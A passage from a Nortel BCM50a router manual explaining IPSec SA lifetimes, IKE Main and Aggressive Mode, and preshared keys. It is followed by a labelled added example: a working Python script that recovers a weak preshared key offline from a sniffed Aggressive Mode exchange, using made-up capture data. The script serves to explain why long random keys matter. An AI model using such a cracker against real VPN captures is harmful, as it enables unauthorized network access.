Nortel Networks BCM50a Network Router User Manual


 
232 Chapter 13 VPN
N0115790
Set the IPSec SA lifetime. In this field, you set how long the IPSec SA stays
up before it expires. The BCM50a Integrated Router automatically renegotiates
the IPSec SA when the lifetime expires if there is traffic at that moment. It
also automatically renegotiates the IPSec SA if both IPSec routers have keep
alive enabled, even if there is no traffic. If an IPSec SA expires without being
renegotiated, the IPSec router must renegotiate the SA the next time someone
attempts to send traffic, so the first packets through the tunnel are delayed
until the new SA is in place.
Negotiation Mode
The phase 1 Negotiation Mode you select determines how the Security
Association (SA) is established for each connection through IKE negotiations.
Main Mode ensures the highest level of security when the communicating parties
are negotiating authentication (phase 1). It uses six messages in three round trips:
SA negotiation, a Diffie-Hellman exchange together with an exchange of nonces
(a nonce is a random number), and an exchange of identities and authentication
data. The third round trip is already encrypted with keys derived from the
Diffie-Hellman exchange, so this mode features identity protection (your identity
is not revealed to an observer of the negotiation).
Aggressive Mode is quicker than Main Mode because it eliminates several steps
when the communicating parties are negotiating authentication (phase 1): it
needs only three messages. The trade-off is that it limits what can be
negotiated, because the initiator must send its Diffie-Hellman public value in
the first message, so the Diffie-Hellman group has to be agreed in advance
rather than negotiated. It also does not provide identity protection: the
identities, nonces and authentication hashes travel in the clear in the first
two messages. With preshared key authentication this lets a passive observer
test guessed keys against the captured negotiation offline, so the preshared key
must be long and random. Aggressive Mode is useful in remote access situations
where the address of the initiator is not known by the responder and both
parties want to use preshared key authentication.
Preshared key
A preshared key identifies a communicating party during a phase 1 IKE
negotiation. It is called preshared because both parties must be configured with
the same key, through a separate secure channel, before they can communicate
with each other over a secure connection. Because the key is the only secret
that authenticates the peers, choose a long, random value and do not reuse it
across peers.
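The following is an added example, not code from the Nortel manual, to show why the Aggressive Mode and preshared key cautions above matter. It reconstructs the IKEv1 responder hash HASH_R from the fields that Aggressive Mode messages 1 and 2 send unencrypted (RFC 2409), and then tests a wordlist of candidate preshared keys against a captured HASH_R. The prf is assumed to be HMAC-SHA1 (the negotiated hash attribute is SHA-1), all capture values are constructed here rather than taken from a real BCM50a exchange, and the gateway name and sample passwords are invented.

```python
"""Offline preshared-key test against an IKEv1 Aggressive Mode capture.

In Aggressive Mode message 2 carries HASH_R unencrypted. HASH_R is keyed by
SKEYID, and for preshared-key authentication SKEYID = prf(PSK, Ni_b | Nr_b).
Every other input to HASH_R (nonces, DH public values, cookies, SA payload,
responder ID) is also visible on the wire, so a passive observer can test
candidate PSKs without ever talking to the gateway. In Main Mode HASH_R is
sent in message 6 under SKEYID_e, which depends on the Diffie-Hellman secret
g^xy that the observer does not have, so this attack does not apply there.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional


@dataclass(frozen=True)
class AggressiveCapture:
    """Fields a sniffer reads from Aggressive Mode messages 1 and 2.

    Values are constructed for this example (not a real capture). Real
    cookies are 8 bytes, nonces 8 to 256 bytes, DH values 96 bytes or more.
    """
    cky_i: bytes   # initiator cookie (ISAKMP header)
    cky_r: bytes   # responder cookie (ISAKMP header)
    sai_b: bytes   # initiator SA payload body, without the generic header
    ni_b: bytes    # initiator nonce body
    nr_b: bytes    # responder nonce body
    gxi: bytes     # initiator DH public value (KE payload body)
    gxr: bytes     # responder DH public value (KE payload body)
    idir_b: bytes  # responder ID payload body
    hash_r: bytes  # HASH_R exactly as sent in message 2


def prf(key: bytes, data: bytes) -> bytes:
    """IKEv1 prf when the negotiated hash is SHA-1: HMAC-SHA1 (assumed here)."""
    return hmac.new(key, data, hashlib.sha1).digest()


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes) -> bytes:
    """SKEYID = prf(pre-shared-key, Ni_b | Nr_b)  (RFC 2409 section 5.4)."""
    return prf(psk, ni_b + nr_b)


def compute_hash_r(cap: AggressiveCapture, psk: bytes) -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    skeyid = skeyid_psk(psk, cap.ni_b, cap.nr_b)
    return prf(skeyid, cap.gxr + cap.gxi + cap.cky_r + cap.cky_i
               + cap.sai_b + cap.idir_b)


def recover_psk(cap: AggressiveCapture,
                wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Return the first candidate whose HASH_R matches the capture, else None."""
    for candidate in wordlist:
        if hmac.compare_digest(compute_hash_r(cap, candidate), cap.hash_r):
            return candidate
    return None


def build_sample_capture(psk: bytes) -> AggressiveCapture:
    """Construct a capture as a gateway configured with `psk` would produce it.

    All bytes below are made up for the example; only their presence on the
    wire matters for HASH_R, not their meaning.
    """
    fields = dict(
        cky_i=bytes.fromhex("0123456789abcdef"),
        cky_r=bytes.fromhex("fedcba9876543210"),
        # SA body: DOI=IPsec(1), situation=SIT_IDENTITY_ONLY(1), opaque proposal
        sai_b=bytes.fromhex("00000001" "00000001") + b"\x00" * 40,
        ni_b=bytes.fromhex("11" * 16),
        nr_b=bytes.fromhex("22" * 16),
        gxi=bytes.fromhex("aa" * 96),
        gxr=bytes.fromhex("bb" * 96),
        # ID body: type ID_FQDN(2), protocol 0, port 0, then the name (invented)
        idir_b=bytes([2, 0, 0, 0]) + b"bcm50a.example.net",
    )
    partial = AggressiveCapture(hash_r=b"", **fields)
    return AggressiveCapture(hash_r=compute_hash_r(partial, psk), **fields)


if __name__ == "__main__":
    capture = build_sample_capture(b"summer2006")          # weak, invented PSK
    wordlist = [b"password", b"nortel", b"summer2006", b"vpn123"]
    print("recovered preshared key:", recover_psk(capture, wordlist))
```

The point of the example is the direction of the check: nothing in `recover_psk` contacts the peer, so a short or dictionary-word preshared key used with Aggressive Mode can be recovered from a single sniffed negotiation, which is why the key should be long and random and why Main Mode is preferred whenever the initiator's address is known.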